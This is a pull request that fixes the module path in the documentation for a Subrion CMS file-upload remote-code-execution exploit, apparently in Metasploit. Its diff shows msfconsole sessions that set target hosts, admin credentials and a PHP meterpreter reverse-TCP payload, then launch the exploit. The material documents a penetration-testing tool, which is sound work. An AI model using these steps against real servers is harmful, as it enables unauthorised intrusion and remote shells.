### PR TITLE
Fix exploit/linux typos in Subrion RCE docs

### DIFF
--- a/documentation/modules/exploit/multi/http/subrion_cms_file_upload_rce.md
+++ b/documentation/modules/exploit/multi/http/subrion_cms_file_upload_rce.md
@@ -336,7 +336,7 @@ Once the configuration is done, navigate to `http://subrion-vuln.com/panel/` and
 1. Install and set up Subrion CMS v4.2.1 as described above.
 2. Verify that the Admin Panel login page can be accessed at `http://subrion-vuln.com/panel/`.
 3. Start `msfconsole`
-4. Do: `use exploit/linux/http/subrion_cms_file_upload_rce`
+4. Do: `use exploit/multi/http/subrion_cms_file_upload_rce`
 5. Do: `set RHOSTS [SUBRION_SERVER_IP]`
 6. Do: `set RPORT [SUBRION_SERVER_PORT]`
 7. Do: `set USERNAME [username]`
@@ -370,15 +370,15 @@ This is the password for the Subrion CMS admin panel page, also required for exp
 * Using PHP payload - default TARGET 0
 
 ```
-msf6 > use exploit/linux/http/subrion_cms_file_upload_rce 
+msf6 > use exploit/multi/http/subrion_cms_file_upload_rce 
 [*] Using configured payload php/meterpreter/reverse_tcp
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.245.138
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.245.138
 RHOSTS => 192.168.245.138
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set RPORT 8080
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RPORT 8080
 RPORT => 8080
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set LHOST eth0
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST eth0
 LHOST => eth0
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.245.128:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
@@ -413,17 +413,17 @@ meterpreter >
 * Using PHP payload - default TARGET 0
 
 ```
-msf6 > use exploit/linux/http/subrion_cms_file_upload_rce 
+msf6 > use exploit/multi/http/subrion_cms_file_upload_rce 
 [*] Using configured payload php/meterpreter/reverse_tcp
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.29.1
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.29.1
 RHOSTS => 192.168.29.1
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set RPORT 8080
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RPORT 8080
 RPORT => 8080
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set LHOST eth0
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST eth0
 LHOST => eth0
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set PASSWORD 123456
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set PASSWORD 123456
 PASSWORD => 123456
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.245.128:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
@@ -458,7 +458,7 @@ meterpreter >
 * Using PHP payload - default TARGET 0
 
 ```
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > run rhosts=192.168.100.103 lhost=192.168.100.1 username=admin password=123456 verbose=true targeturi=subrion/
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > run rhosts=192.168.100.103 lhost=192.168.100.1 username=admin password=123456 verbose=true targeturi=subrion/
 
 [*] Started reverse TCP handler on 192.168.100.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
@@ -492,15 +492,15 @@ Meterpreter : php/windows
 * Using PHP paylod - default TARGET 0
 
 ```
-msf6 > use exploit/linux/http/subrion_cms_file_upload_rce 
+msf6 > use exploit/multi/http/subrion_cms_file_upload_rce 
 [*] Using configured payload php/meterpreter/reverse_tcp
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.29.1
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.29.1
 RHOSTS => 192.168.29.1
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set LHOST eth0
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST eth0
 LHOST => eth0
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set PASSWORD 123456
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set PASSWORD 123456
 PASSWORD => 123456
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.245.128:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
@@ -535,13 +535,13 @@ meterpreter >
 * Using PHP paylod - default TARGET 0
 
 ```
-msf6 > use exploit/linux/http/subrion_cms_file_upload_rce
+msf6 > use exploit/multi/http/subrion_cms_file_upload_rce
 [*] Using configured payload php/meterpreter/reverse_tcp
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.245.133
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.245.133
 RHOSTS => 192.168.245.133
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set LHOST eth0
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST eth0
 LHOST => 192.168.245.128
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.245.128:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
@@ -577,15 +577,15 @@ meterpreter >
 * Using PHP paylod - default TARGET 0
 
 ```
-msf6 > use exploit/linux/http/subrion_cms_file_upload_rce
+msf6 > use exploit/multi/http/subrion_cms_file_upload_rce
 [*] Using configured payload php/meterpreter/reverse_tcp
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.195.163
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set RHOSTS 192.168.195.163
 RHOSTS => 192.168.195.163
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set LHOST tun0
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LHOST tun0
 LHOST => tun0
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > set LPORT 80
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > set LPORT 80
 LPORT => 80
-msf6 exploit(linux/http/subrion_cms_file_upload_rce) > exploit
+msf6 exploit(multi/http/subrion_cms_file_upload_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.45.162:80 
 [*] Running automatic check ("set AutoCheck false" to disable)


### PR DESCRIPTION
This PR fixes the `exploit/linux` typos that were not changed in the documentation after moving the Subrion CMS module from `exploit/linux` to `exploit/multi` in 19dcc2d674a47eb825d3c95d542f0b2f82589ef3. This will fix #18258